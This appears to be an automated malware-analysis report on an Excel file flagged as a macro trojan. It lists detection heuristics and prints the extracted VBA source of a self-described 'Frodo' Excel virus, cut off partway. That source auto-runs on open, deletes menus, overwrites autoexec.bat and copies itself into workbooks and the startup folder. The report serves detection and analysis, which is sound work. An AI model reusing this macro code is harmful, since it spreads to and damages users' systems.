Verdict: MALICIOUS
Risk Score: 320

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV as Xls.Trojan.Cartel-1. It contains an AutoOpen VBA macro that uses obfuscated code, CreateObject, and Shell() calls. This indicates the macro is designed to execute arbitrary code, likely downloading and running a secondary payload.
Heuristics (7)

- ClamAV: Xls.Trojan.Cartel-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Cartel-1
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23915 bytes |

SHA-256: fd7441998ecd6a355bd317a108182dbdf2ca8a60a4f12b4bc5eaf775d266aa3e
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modulo1"
' -------------------------------
' - Frodo.vba.Excel Virus v 1.0 -
' - based on the parasite virus -
' - Using polymorphic and string-
' - encryption -
' -------------------------------
Sub AutoOpen() ' autoexecute on open
Application.OnSheetActivate = "frodo" ' attach the procedure (Frodo) to the SheetActivate event
Call Mail ' Call Mail Procedure
End Sub
Sub frodo()
On Error Resume Next
vname = crypt("gsnen")
dwp = crypt("Qdsrno`m/ymr")
dvp = Application.StartupPath & "\" & dwb
counter1 = 0
Counter2 = 0
With Application
.ScreenUpdating = False
.DisplayAlert = False
.EnableCancelKey = xlDisabled
End With
Set cb = CommandBars
Set ctrl = Controls
cb("Tools").ctrl(10).Delete: cb("Tools").ctrl(12).Delete
cb("View").ctrl(3).Delete: cb("Window").ctrl(3).Delete
cb("Window").ctrl(4).Delete
Call Polymorph ' Start Polymorphic Engine
Randomize
If Int((Rnd * 10) + 1) = 10 Then
Application.Caption = crypt("Gsnen!Mhwdr!rnldvidsd!ho!Uhld")
Application.StatusBar = crypt("Dybdm!Rtyy")
Open "c:\autoexec.bat" For Output Access Write As 1
Print #1, "@Echo off"
Print #1, "Echo ---------------------------"
Print #1, "Echo - You owned by Frodo -"
Print #1, "Echo - greets to Mr Shaer -"
Print #1, "Echo - 28.03.2002 -"
Print #1, "Echo - (C)by Dark Eclipse -"
Print #1, "Echo ---------------------------"
Close 1
End If
If Month(Now) = 22 And Day(Now) = 5 Then Call bla
If Month(Now) = 23 And Day(Now) = 5 Then Call blubb
Application.VBE.ActiveVBProject.VBComponents.Item(vname).Export Application.StartupPath & "\" & crypt("shofd/ymr/c`r")
If Dir(dvp) = dwp Then Counter2 = 1
For X = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(X).Name = vname Then counter1 = 1
Next X
If counter1 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import Application.StartupPath & "\" & crypt("shofd/ymr/c`r")
ActiveWorkbook.Save
End If
If Counter2 = 0 Then
Workbook.Add.SaveAs FileName:=dvp
ActiveWorkbook.VBProject.VBComponents.Import Application.StartupPath & "\" & crypt("shofd/ymr/c`r")
ActiveWindow.Visible = False
Workbook(dwp).Save
End If
End Sub
Sub bla()
On Error Resume Next
CommandBars("Edit").Enabled = False: CommandBars("Insert").Enabled = False
CommandBars("Files").Enabled = False: CommandBard("Tools").Enabled = False
End Sub
Sub blubb()
On Error Resume Next
CommandBars("Edit").Enabled = True: CommandBars("Insert").Enabled = True
CommandBars("Files").Enabled = True: CommandBars("Tools").Enabled = True
End Sub
Sub ViewVBCode()
MsgBox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(118) + Chr(101) + Chr(114) + Chr(115) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(111) + Chr(102) + Chr(32) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + C
```

... (truncated)